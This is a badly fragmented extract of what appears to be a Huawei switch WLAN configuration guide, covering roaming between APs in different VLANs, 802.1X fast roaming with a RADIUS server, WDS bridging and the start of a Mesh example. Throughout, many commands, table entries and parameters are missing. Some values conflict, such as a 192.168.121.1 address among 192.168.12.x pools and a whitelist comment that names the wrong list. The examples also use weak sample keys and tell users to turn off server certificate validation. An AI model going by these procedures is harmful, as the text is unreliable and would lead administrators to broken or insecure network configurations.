192.168.11.254/24
VLANIF 102: None

192.168.121.1/24
192.168.12.2 to
192.168.12.254/24
1. The default security policy is used and access authentication is not required, which
shortens the roaming switchover time. Configure non-fast roaming between APs in
different service VLANs to ensure nonstop service transmission during roaming.
CAPWAP packets.
APs.

Procedure
VLAN 100.

[HUAWEI] sysname AC
[AC] vlan batch 100
Step 2 Connect the AC to the upper-level network device.

# Add the AC uplink interface GE1/0/3 to VLAN101 and VLAN102.
Step 3 Configure the AC to function as a DHCP server to assign IP addresses to the STAs and APs.
# Configure the DHCP server based on the interface address pool. VLANIF100 provides IP
addresses for AP1 and AP2, VLANIF101 provides IP addresses for STAs connected to AP1,
and VLANIF102 provides IP addresses for STAs connected to AP2.
[AC-Vlanif100] quit
[AC-Vlanif101] quit
[AC-Vlanif102] quit




AC ID to 1.

[AC] wlan
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------

[AC-wlan-view] quit
# Create a WLAN-ESS interface. To implement roaming between APs in different service

VLANs, configure two service VLANs (VLAN101 and VLAN102) on each WLAN-ESS
interface.
[AC-Wlan-Ess0] quit
[AC-Wlan-Ess1] quit
Create a security profile named security.

[AC] wlan
WPA2.
# Configure service sets for AP1 and AP2, and set the data forwarding mode to tunnel
forwarding.
[AC-wlan-view] service-set name huawei-1

[AC-wlan-service-set-huawei-1] ssid test
[AC-wlan-service-set-huawei-1] wlan-ess 0
[AC-wlan-service-set-huawei-1] service-vlan 101
[AC-wlan-service-set-huawei-1] security-profile name security
[AC-wlan-service-set-huawei-1] traffic-profile name traffic
[AC-wlan-service-set-huawei-1] forward-mode tunnel

[AC-wlan-service-set-huawei-1] quit
# Configure a VAP.
[AC-wlan-radio-1/0] service-set name huawei-1

:y
:y
the coverage area of AP1.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1
AP2.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1
STA roaming track.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39

------------------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.12.1 255.255.255.0
#
#
#
#
interface Wlan-Ess0
#

interface Wlan-Ess1
#
wlan
ap-region id 10
region-id 10
region-id 10
service-set name huawei-1 id 0
forward-mode tunnel
wlan-ess 0
ssid test
service-vlan 101
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 102
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
#
return
15.9.4 Example for Configuring Fast Roaming Between APs in

Different Service VLANs
Roaming Between APs in Different Service VLANs Overview
WLAN roaming allows a STA to move from the coverage area of an AP to that of another AP
with nonstop service transmission. In roaming between APs in different service VLANs, APs
before and after STA roaming belong to different service VLANs. To prevent services of a
user from being interrupted during WLAN roaming, ensure that the service VLAN of the user
remains unchanged after the user roams between two APs.
roaming. Non-fast roaming technology is used when a STA uses a non-WPA2-802.1x security
policy. If a STA uses WPA2-802.1x but does not support fast roaming, the STA still needs to
complete 802.1x authentication before roaming between two APs. When the user uses the
WPA2-802.1x security policy and supports fast roaming, the user does not need to perform
802.1x authentication again during roaming and only needs to perform key negotiation. In this
case, fast roaming reduces the roaming delay and improves the WLAN service experience.

Configuration Notes
profile view.
Configuration.


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-13, two APs are deployed in a campus network to provide WLAN
services for employees of two departments, and are managed and controlled by an AC. The
AC dynamically assigns IP addresses to the APs and STAs. The employees of the two
departments belong to different VLANs, that is, AP1 belongs to VLAN101 and AP2 belongs
to VLAN102. The security policy WPA2-802.1X is used. User data is forwarded through
tunnels.

to AP2.
Figure 15-13 Networking diagram for configuring fast roaming between APs in different
service VLANs
In te rn e t
G E 1 /0 /3
VLAN 101 G E 1 /0 /4
VLAN 102 R A D IU S
AC se rve r 1 9 2 .1 6 8 .0 .2 /2 4
G E 1 /0 /1
V L A N 1 0 0 G E 0 /0 /3
S w itch A VLAN 100
G E 0 /0 /1 G E 0 /0 /2
VLAN 100 VLAN 100
AP1 AP2
S S ID ： te st Roam S S ID ： te st
Channel 1 C hannel 6
STA STA
M anagem ent VLAN： VLAN 100 M anagem ent VLAN： VLAN 100
S e rvice V L A N ： V L A N 1 0 1 S e rvice V L A N ： V L A N 1 0 2
A P re g io n ID : 1 0 A P re g io n ID : 1 0
Data Planning


source interface

l Security and
WPA2+802.1X
l Authentication key: hello

Service set l Name: huawei-1 None

l SSID: test
WLAN-ESS 0
tunnel forwarding
l Name: huawei-2 None

l SSID: test
WLAN-ESS 1
tunnel forwarding


pool range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

pool range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24
VLANIF 102: None

192.168.121.1/24
192.168.12.2 to
192.168.12.254/24
1. The security policy WPA2-802.1X is used and access authentication is required, which
results in longer roaming switchover time. Configure fast roaming between APs in the
CAPWAP packets.
3. Configure the AC as a DHCP server to assign IP addresses to the STAs and APs.
5. Configure key negotiation between STAs and APs to shorten the roaming switchover
time.

Procedure
VLAN 100.

[HUAWEI] sysname AC
[AC] vlan batch 100
Step 2 Connect the AC to the upper-level network device.

# Add the AC uplink interface GE1/0/3 to VLAN 101 and VLAN 102, and add GE1/0/4 of
the AC connecting to the RADIUS server to VLAN 103.
[AC] vlan batch 101 to 103
[AC-GigabitEthernet1/0/4] port trunk pvid vlan 103
Step 3 Configure the AC to function as a DHCP server to assign IP addresses to the STAs and APs,
and configure VLANIF 103 to allow the AC to communicate with the RADIUS server.
# Configure the DHCP server based on the interface address pool. VLANIF100 provides IP
addresses for AP1 and AP2, VLANIF101 provides IP addresses for STAs connected to AP1,
and VLANIF102 provides IP addresses for STAs connected to AP2.
[AC-Vlanif100] quit
[AC-Vlanif101] quit


[AC-Vlanif102] quit
# Configure VLANIF 103.

[AC-Vlanif103] quit
Step 4 Configure an AAA domain to which a RADIUS server template is applied.

information.
NOTE
Ensure that the AC and RADIUS server have the same shared key.
[AC] radius-server template radius_huawei //Creates a RADIUS server template
[AC-radius-radius_huawei] radius-server authentication 192.168.0.2 1812 //
Specify the IP address and the port number of a RADIUS authentication server.
[AC-radius-radius_huawei] radius-server shared-key cipher hello //Configure
the shared key of a RADIUS server
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei //Create an authentication
scheme
[AC-aaa-authen-radius_huawei] authentication-mode radius //Set the
authentication mode to radius.
[AC-aaa] domain huawei.com //Create a domain
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei //Configure
an authentication scheme in the domain.
[AC-aaa-domain-huawei.com] radius-server radius_huawei //Configure a RADIUS
server template for the domain.
[AC-aaa] quit
NOTE
After domain huawei.com is configured, the domain name is added to the authentication user
name.
2. Test whether a STA can be authenticated using RADIUS authentication. A user name
test@huawei.com and password 123456 have been configured on the RADIUS server.


AC ID to 1.

[AC] wlan



------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------


[AC-wlan-view] quit
# Create a WLAN-ESS interface. To implement roaming between APs in different service

VLANs, configure two service VLANs (VLAN101 and VLAN102) on each WLAN-ESS
interface.
[AC-Wlan-Ess0] authentication dot1x //Enable 802.1x authentication.
[AC-Wlan-Ess0] dot1x authentication-method eap //Configure EAP relay
[AC-Wlan-Ess0] domain name huawei.com force //Configure a forcible
[AC-Wlan-Ess0] permit-domain name huawei.com //Configure a permitted domain for
WLAN users.
[AC-Wlan-Ess0] quit
[AC-Wlan-Ess1] authentication dot1x
[AC-Wlan-Ess1] dot1x authentication-method eap
[AC-Wlan-Ess1] quit
# Create a security profile named security and configure the security policy to
WPA2-802.1X.
[AC] wlan
[AC-wlan-sec-prof-security] security-policy wpa2
[AC-wlan-sec-prof-security] wpa2 authentication-method dot1x encryption-method
ccmp //Configure WPA2 802.1x authentication and encryption.
# Configure service sets for AP1 and AP2, and set the data forwarding mode to tunnel
forwarding.



# Configure a VAP.

:y
:y
the coverage area of AP1. Use 802.1X authentication on the STA and enter the user name and
password. If the authentication succeeds, the STA can connect to the Internet. Configure the
STA according to the configured authentication mode PEAP.
l Configuration on the Windows XP operating system:

a. On the Association tab page of the Wireless network properties dialog box, add
SSID test, set the authentication mode to WPA2, encryption mode to CCMP, and
encryption algorithm to AES.
b. On the Authentication tab page, set EAP type to PEAP and click Properties. In
the Protected EAP Properties dialog box, deselect Validate server certificate and
click Configure. In the displayed dialog box, deselect Automatically use my
Windows logon name and password and click OK.
l Configuration on the Windows 7 operating system:
a. Access the Manage wireless networks page, click Add, and select Manually
create a network profile. Add SSID test. Set the authentication mode to WPA2-
Enterprise, the encryption mode to CCMP, and the algorithm to AES. Click Next.
b. Scan SSIDs and double-click SSID test. On the Security tab page, set EAP type to
PEAP and click Settings. In the displayed dialog box, deselect Validate server
certificate and click Configure. In the displayed dialog box, deselect
Automatically use my Windows logon name and password and click OK.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1

AP2.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1
STA roaming track.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39
------------------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
radius-server shared-key cipher %#%#`z0u2h-7qBdp(x:|E]|#62(s!J~(}*DNPx<+Bbr!
%#%
#
aaa
domain huawei.com

#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.12.1 255.255.255.0
#
interface Vlanif103
ip address 192.168.0.1 255.255.255.0
#
#
#
#
#
interface Wlan-Ess0
port trunk allow-pass vlan 101 to
102
#
interface Wlan-Ess1
#
wlan
ap-region id 10
region-id 10
region-id 10
forward-mode tunnel
wlan-ess 0
ssid test
service-vlan 101


forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 102
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
#
return
15.10 Example for Configuring the WLAN Service Using

WDS Technology
WDS Overview
A wireless distribution system (WDS) connects two or more wired or wireless LANs using
wireless links to establish a large network.
On a traditional WLAN network, APs connect to an AC through wired uplinks. However,

wired connections are difficult or costly to implement in some areas such as tunnels and
docks. WDS technology can be used in these areas to connect APs to an AC using wireless
links. This technology facilities WLAN deployment in complex geographical environments,
reduces network deployment cost, allows flexible networking, and makes the network easy to
expand.
APs on a WDS network work in any of the following modes:

l Root: A root AP connects to an AC using a wired link and connects to a middle or leaf
AP using an uplink wireless link.
l Middle: A middle AP is an intermediate node between an upstream root AP and a
downstream leaf AP. It connects to the root and leaf APs using wireless links.
l Leaf: A leaf AP connects to a root or middle AP using an uplink wireless link.
Both WDS and Mesh technologies can implement wireless bridging between APs. A WDS
network supports a maximum of three hops (for example, a WDS link established along a root
node, a middle node, and a leaf node is a three-hop link), whereas a Mesh network supports a
maximum of eight hops. A WDS network has a tree topology and does not support link
redundancy between nodes. A Mesh network has a Mesh topology and supports link
redundancy between nodes. Therefore, a Mesh network is more reliable than a WDS network.
You can choose WDS or Mesh technology to deploy wireless bridging between APs
according to your needs.
Configuration Notes
l The AP2030DN, AP7030DE, AP9330DN, AP6310SN-GN and AP2010DN do not
support the WDS function.

l On a WDS or Mesh network, an 802.11ac AP cannot interoperate with non-802.11ac

APs regardless of the radio types used by the AP. Only 802.11ac APs can interoperate
with each other.
NOTE
Among all WDS- or Mesh-capable APs, the AP4030DN, AP4130DN, AP5030DN, AP8030DN,
AP8130DN, and AP5130DN are 802.11ac APs.
l If radio 0 of the AP8130DN is configured to work on the 5 GHz frequency band and
used for WDS or Mesh services, the software version of the AP connected to the
AP8130DN must be V200R005C10 or later.
l When planning a WDS network, pay attention to the following:
– The back-to-back WDS networking involves two WDS networks. A single WDS
network cannot form a back-to-back WDS network.
– Only one root node exists on the WDS network.
– A middle node sets up WDS links only with the leaf node and root node. Middle
nodes do not set up WDS links between each other.
– Each WDS link allows a maximum of three hops (a 3-hop WDS link includes a root
node, a middle node, and a leaf node).
– Each node on the WDS link supports a maximum of six subnodes.
l WDS and Mesh technologies cannot be used on the same network.
l If WDS and Mesh services are configured on an AP radio, WIDS, spectrum analysis, or
WLAN location on the radio does not take effect.

are
Versi
on
V200 S12700 V200R005C00:

R005C AP3010DN-AGN, AP5010DN-AGN, AP5010SN-
00 GN, AP5030DN, AP5130DN, AP6010SN-GN,
AGN, AP7110DN-AGN, AP7110SN-GN
V200 S12700 V200R005C00:



are
Versi
on
V200 S12700 V200R005C10:

AGN, AP7110DN-AGN, AP7110SN-GN,
AP8030DN, AP8130DN
V200 S12700 V200R005C10:

AP8030DN, AP8130DN
V200R005C30:
AP4030DN, AP4130DN
An enterprise has three office locations: Area A, Area B, and Area C. AP1 in Area A can
connect to SwitchA through cables, but AP2 in Area B and AP3 in Area C cannot. The
enterprise needs to provide Internet access for WLAN users in the three areas and wired users
in Area C, as shown in Figure 15-14.
Figure 15-14 WLAN WDS networking
IP b a ckb o n e
n e tw o rk
AC
AP3 AP2 AP1 G E 1 /0 /0
(le a f) (m id d le ) (ro o t) G E 0 /0 /2
G E 0 /0 /1
STA
S w itch A
S w itch
STA
A re a C A re a B A re a A
L2
n e tw o rk STA STA
: W ire le ss virtu a l lin k
Data Planning
Before configuring the WDS service, determine the types and MAC addresses of the APs
used as WDS bridges. The following table provides the data plan for this example.

NOTE
The APs used in this example are AP6010DN-AGN.
Table 15-32 AP data required for completing the configuration

AP Type MAC
AP1 AP6010DN-AGN 0046-4b59-1ee0
AP2 AP6010DN-AGN 0046-4b59-1d20
AP3 AP6010DN-AGN 0046-4b59-1d40
The following provides data planning for Mesh service configuration.
Table 15-33 Service data required for completing the configuration

VLAN Management VLAN: 100 None
Service VLANs: 101, 102, 103, 104, The WDS bridges must
105, 106 allow packets of service
l Area A: VLAN 101 for WLAN VLANs to which Area A,
services Area B, and Area C belong.
l Area B: VLAN 102 for WLAN
services
l Area C: VLAN 103 for WLAN
services
l Area C: VLANs 104, 105, and 106
on AP3 wired interfaces
Service Direct forwarding mode None

forwarding
mode on APs
IP address of the VLANIF 100: 192.168.10.1/24 None

AC's source
interface
AP region AP1: 101, AP2: 102, AP3: 103 None
WMM profile Name: wp01 None
Radio profile Name: rp01 and rp02 Use radio profile rp02 for
the WDS service and radio
profile rp01 for basic
WLAN service.

Security profile l Name: sp01 WDS bridges support only

l Security and authentication policy: the security policy using
WPA2+PSK WPA2+PSK authentication
and CCMP encryption.
l Authentication key: huawei123
In this example, the security
l Encryption mode: CCMP profile sp01 is also used for
basic WLAN service. Select
an appropriate security
policy for the WLAN
service in real world
applications.
Traffic profile Name: tp01 None
Bridge profile l Name: bp01 All APs on a WDS network

l Bridge identifier: ChinaNet01 must have the same bridge
ID.
Service set l Name: ss01 None

l SSID: ChinaSer01
l WLAN virtual interface: WLAN-
ESS 1
l Service data forwarding mode: direct
forwarding
l Name: ss02 None

l SSID: ChinaSer02
ESS 2
forwarding
l Name: ss03 None

l SSID: ChinaSer03
ESS 3
forwarding

Bridge whitelist Name: bw01 and bw02 A WDS whitelist profile

contains MAC addresses of
neighboring APs allowed to
set up WDS links with an
AP. After a WDS whitelist
profile is applied to an AP
radio, only APs with MAC
addresses in the whitelist
can access the AP, and other
APs are denied. In the WDS,
only APs with radios
working in root mode and
middle mode can have a
whitelist configured. APs in
leaf mode require no
whitelist.
1. Configure the AC and SwitchA to implement Layer 2 connectivity between the AC,
SwitchA, and AP1.
2. Configure the WDS function to allow AP2 and AP3 to connect to the AC using wireless
links.
3. Configure the basic WLAN service to provide Internet access service for WLAN users in
Area A, Area B, and Area C.
Procedure
Step 1 Connect AC and AP1.
# Configure the access switch SwitchA. Add GE0/0/1 on SwitchA to VLAN 100
(management VLAN), and the PVID of GE0/0/1 is VLAN 100. Configure GE0/0/1 and
GE0/0/2 to allow packets from VLANs 100 to 106 to pass through.
NOTE
Configure port isolation on GE0/0/1 that connects SwitchA and AP. Otherwise, unnecessary packets are
broadcast in the VLAN or WLAN users of different APs can communicate with each other at Layer 2.
[SwitchA] interface gigabitEthernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port-isolate enable //If the port isolation
group is not specified, the interface is added to port isolation group 1 by
default.


# Set the NAC mode to unified mode on the AC (default setting). Configure GE1/0/0 to allow
packets from VLANs 100 to 106 to pass through.
[HUAWEI] sysname AC
[AC] interface gigabitEthernet 1/0/0
[AC-GigabitEthernet1/0/0] port trunk allow-pass vlan 100 to 106
Step 2 Configure the AC to allocate IP addresses for APs and STAs.

# Configure AC as a DHCP server to allocate IP addresses to APs and STAs using an address
pool.
[AC] dhcp enable
[AC-Vlanif100] quit
[AC-Vlanif101] quit
[AC-Vlanif102] quit
[AC-Vlanif103] quit


AC ID to 1.

[AC] wlan
Step 4 Configure the AC to manage APs.

[AC-wlan-view] ap id 1 ap-type AP6010DN-AGN mac 0046-4b59-1ee0
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 ap-type AP6010DN-AGN mac 0046-4b59-1d20
[AC-wlan-ap-2] quit
[AC-wlan-ap-3] quit
# Create AP regions 101, 102, and 103. An AC has a default AP region with the ID 0. AP
regions 101, 102, and 103 are used as an example here.
[AC-wlan-view] ap-region id 101

# Add AP1 to AP region 101, AP2 to AP region 102, and AP3 to AP region 103. By default,
an AP is added to region 0. This example adds the three APs to regions 101, 102, and 103
respectively.
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
[AC-wlan-ap-3] quit
Step 5 Set WDS bridge parameters.

# Create a WMM profile named wp01 and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wp01
[AC-wlan-wmm-prof-wp01] quit
# Create a radio profile rp02 for the WDS bridges, set the channel mode to fixed and retain
the default settings for other parameters, and bind the WMM profile wp01 to the radio profile.
The default channel mode is auto, but the fixed mode must be used in this example.
[AC-wlan-view] radio-profile name rp02 id 1
[AC-wlan-radio-prof-rp02] wmm-profile name wp01
[AC-wlan-radio-prof-rp02] channel-mode fixed // The APs along the WDS link
must use the same channel, so the fixed mode must be used.
[AC-wlan-radio-prof-rp02] quit
# Create the bridge whitelists bw01 and bw02. By default, no bridge whitelist is created. This
example uses whitelist bw01 for the root node and whitelist bw02 for the middle node to
control connection between neighboring APs.
[AC-wlan-view] bridge-whitelist name bw01
[AC-wlan-br-whitelist-bw01] peer ap mac 0046-4b59-1d20 // The middle AP
needs to connect to the root AP, so AP2's MAC address is added to bw01.
[AC-wlan-br-whitelist-bw01] quit
[AC-wlan-view] bridge-whitelist name bw02
[AC-wlan-br-whitelist-bw02] peer ap mac 0046-4b59-1d40 // The leaf AP needs
to connect to the middle AP, so AP3's MAC address is added to bw01.
[AC-wlan-br-whitelist-bw02] quit
# Bind the radio profile rp02 to radio 1 of AP1, set the bridge mode of radio 1 to root, and
bind the bridge whitelist bw01 to radio 1. By default, no bridge whitelist is bound to a radio.
This example binds bridge whitelist bw01 to the root AP's radio.
[AC-wlan-radio-1/1] radio-profile name rp02
[AC-wlan-radio-1/1] bridge enable mode root
[AC-wlan-radio-1/1] bridge-whitelist name bw01
[AC-wlan-radio-1/1] bridge whitelist enable
# Bind the radio profile rp02 to radio 1 of AP2, set the bridge mode of radio 1 to middle, and
bind the bridge whitelist bw02 to radio 1. By default, no bridge whitelist is bound to a radio.
This example binds bridge whitelist bw02 to the middle AP's radio.
[AC-wlan-radio-2/1] bridge enable mode middle
[AC-wlan-radio-2/1] bridge-whitelist name bw02

[AC-wlan-radio-2/1] bridge whitelist enable

# Bind AP3 radio 1 to the radio profile rp02 and set the wireless bridge working mode to leaf.
[AC-wlan-radio-3/1] bridge enable mode leaf
# After the preceding configurations are complete, power on the APs. If the APs have been
powered on, restart the root AP to make the configuration take effect. Run the display ap all
and display bridge-link all commands on the AC to check whether the APs work properly
and whether WVLs are successfully established. If the WVLs are displayed and the status of
all the APs are normal, the management bridge is successfully established.
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
1 AP6010DN-AGN 0046-4b59-1ee0 0/101 normal ap-1
2 AP6010DN-AGN 0046-4b59-1d20 0/102 normal ap-2
------------------------------------------------------------------------------
[AC-wlan-view] display bridge-link all
------------------------------------------------------------------------------
AP ID AP MAC Radio ID Coverage Distance(100m) Channel Bridge Work
Mode
Peer AP MAC Peer AP ID Peer AP Status RSSI(dBm) Max RSSI(dBm)
------------------------------------------------------------------------------
1 0046-4b59-1ee0 1 3 149 root
0046-4b59-1d20 2 normal -33 -32
2 0046-4b59-1d20 1 3 149 middle
0046-4b59-1ee0 1 normal -31 -31
2 0046-4b59-1d20 1 3 149 middle
0046-4b59-1d40 3 normal -33 -32
3 0046-4b59-1d40 1 3 149 leaf
0046-4b59-1d20 2 normal -31 -31
------------------------------------------------------------------------------
Total: 4
Step 6 Configure a radio profile and a WLAN-ESS interface.

# Create the radio profile rp01 for user services, use the default settings, and bind the radio
profile to the WMM profile wp01.
[AC-wlan-view] quit
# Create a WLAN-ESS interface.

[AC-Wlan-Ess1] quit
[AC-Wlan-Ess2] quit
[AC-Wlan-Ess3] quit

Step 7 Configure the bridge profile and service set.

# Create security profile sp01, set the security and authentication policy to WPA2-PSK, set
the authentication key to huawei123, and set the encryption mode to CCMP.
NOTE
The AP that establishes the bridge on a WDS network supports only WPA2+PSK+CCMP.
[AC] wlan
[AC-wlan-view] security-profile name sp01
[AC-wlan-sec-prof-sp01] security-policy wpa2
[AC-wlan-sec-prof-sp01] wpa2 authentication-method psk pass-phrase cipher
huawei123 encryption-method ccmp
[AC-wlan-sec-prof-sp01] quit
# Create a bridge profile with the name bp01 and identifier ChinaNet01, and bind the bridge
profile to the security profile sp01.
[AC-wlan-view] bridge-profile name bp01
[AC-wlan-bridge-prof-bp01] bridge-name ChinaNet01
[AC-wlan-bridge-prof-bp01] vlan tagged 101 to 106 // Allow packets of
service VLANs to pass.
[AC-wlan-bridge-prof-bp01] security-profile name sp01
[AC-wlan-bridge-prof-bp01] quit
# Create traffic profile tp01 and use the default settings.

[AC-wlan-view] traffic-profile name tp01
[AC-wlan-traffic-prof-tp01] quit
# Create and configure a service set ss01 and SSID ChinaSer01.

[AC-wlan-view] service-set name ss01
[AC-wlan-service-set-ss01] traffic-profile name tp01
[AC-wlan-service-set-ss01] security-profile name sp01
[AC-wlan-service-set-ss01] ssid ChinaSer01
[AC-wlan-service-set-ss01] service-vlan 101 // Change the VLAN ID of the
service set to 101. (The default VLAN ID is 1.)
[AC-wlan-service-set-ss01] wlan-ess 1
[AC-wlan-service-set-ss01] quit


# Create a bridge VAP on AP1 radio 1 and bind the radio to the bridge profile. Create a
service VAP on AP1 radio 0 and bind the radio to the radio profile and service set.
[AC-wlan-radio-1/0] service-set name ss01

[AC-wlan-radio-1/1] bridge-profile name bp01
[AC-wlan-radio-1/1] channel 40mhz-plus 157 // Radios that establish a WDS
link must use the same channel and bandwidth. Here, the radios use 40 Mhz
bandwidth and channel 157.
Step 8 Configure APs' wired interfaces.
# Set parameters for the AP3 wired interface.

[AC-wlan-ap-3] lineate-port gigabitethernet 0 mode endpoint // On a WDS
network, downlink wired interfaces of APs must be set to the endpoint mode.
[AC-wlan-ap-3] lineate-port gigabitethernet 0 vlan tagged 104 to 106 // Add
the AP's wired interface to VLANs 104, 105, and 106 in tagged mode.
[AC-wlan-ap-3] quit
NOTE
After changing the working mode of AP wired interfaces, reset the APs to make the configurations take
effect.
Step 9 Deliver parameters to APs.
The AP parameters configured on the AC take effect only after they are delivered to the APs.
:y
:y
:y
WLAN users in areas A, B, and C and wired users in area C can access the Internet.
----End

Configuration Files
#
sysname SwitchA
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif103
ip address 192.168.3.1 255.255.255.0
#
#
interface Wlan-Ess1
#
interface Wlan-Ess2
#
interface Wlan-Ess3
#
wlan
ap-region id 101
ap-region id 102
ap-region id 103
ap id 1 type-id 19 mac 0046-4b59-1ee0 sn 210235555310CC003587
region-id 101
ap id 2 type-id 19 mac 0046-4b59-1d20 sn 210235555310CC000094
region-id 102
ap id 3 type-id 19 mac 0046-4b59-1d40 sn 210235555310CC00AC69

region-id 103
lineate-port gigabitethernet 0 mode endpoint
lineate-port gigabitethernet 0 vlan tagged 104 to 106
wmm-profile name wp01 id 0
traffic-profile name tp01 id 0
security-profile name sp01 id 0
wpa2 authentication-method psk pass-phrase cipher %@%@QGZ2"N.FU!8XFIGcV\
{QFUWb
%@%@ encryption-method ccmp
service-set name ss01 id 0
wlan-ess 1
ssid ChinaSer01
service-vlan 101
wlan-ess 2
ssid ChinaSer02
service-vlan 102
wlan-ess 3
ssid ChinaSer03
service-vlan 103
bridge-profile name bp01 id 0
bridge-name ChinaNet01
vlan tagged 101 to 106
radio-profile name rp01 id 0
wmm-profile id 0
channel-mode
fixed
wmm-profile id 1
bridge-whitelist name bw01 id 0
peer ap mac 0046-4b59-1d20
bridge-whitelist name bw02 id 1
ap 1 radio 0
radio-profile id 0
ap 1 radio 1
radio-profile id 1
bridge enable mode root
bridge whitelist enable
bridge-whitelist id 0
bridge-profile id 0
ap 2 radio 0
radio-profile id 0
ap 2 radio 1
radio-profile id 1
bridge enable mode middle
bridge whitelist enable
bridge-whitelist id 1
bridge-profile id 0
ap 3 radio 0
radio-profile id 0
ap 3 radio 1
radio-profile id 1
bridge enable mode leaf

bridge-profile id 0
#
return

Mesh Technology
Mesh Overview
Mesh is short for wireless Mesh network (WMN), which is constituted by APs wirelessly
connected in a Mesh topology.
On a traditional WLAN network, APs connect to an AC through wired uplinks. Wired

network deployment is costly in areas where network cables are difficult to deploy, for
example, tunnels and docks. In these areas, Mesh technology can be used to deploy a wireless
network quickly. A Mesh network supports dynamic, automatic configuration, allowing you
to add or remove Mesh nodes flexibly. In addition, Mesh technology supports link redundancy
between APs so that the failure of a single node will not affect the entire network. This
improves network robustness.
A Mesh network has two types of nodes:

l Mesh portal point (MPP): a Mesh point that connects the Mesh network to other types of
networks. This node provides the portal function to allow Mesh nodes to communicate
with external networks.
l Mesh point (MP): a Mesh-capable node that uses IEEE 802.11 MAC and physical layer
protocols for wireless communication. This node supports automatic topology discovery,
automatic route discovery, and data packet forwarding. MPs can provide both Mesh
service and user access service.
Configuration Notes
support the Mesh function.
with each other.
NOTE

l It is recommended that you deploy no more than 40 Mesh nodes on a Mesh network.

are
Versi
on
V200 S12700 V200R005C00:

V200 S12700 V200R005C00:

V200 S12700 V200R005C10:

AP8030DN, AP8130DN
V200 S12700 V200R005C10:

AP8030DN, AP8130DN
V200R005C30:
AP4030DN, AP4130DN
An enterprise has three office locations: Area A, Area B, and Area C. AP1 in Area A can
connect to the access switch (SwitchA) through a wired link, but AP2 in Area B and AP3 in

Area C cannot. A WMN needs to be deployed in the three areas to connect AP2 and AP3 to
the enterprise network, as shown in Figure 15-15.
Figure 15-15 Mesh networking

IP
b a ckb o n e
n e tw o rk
AC
AP3 AP2 AP1 G E 1 /0 /1
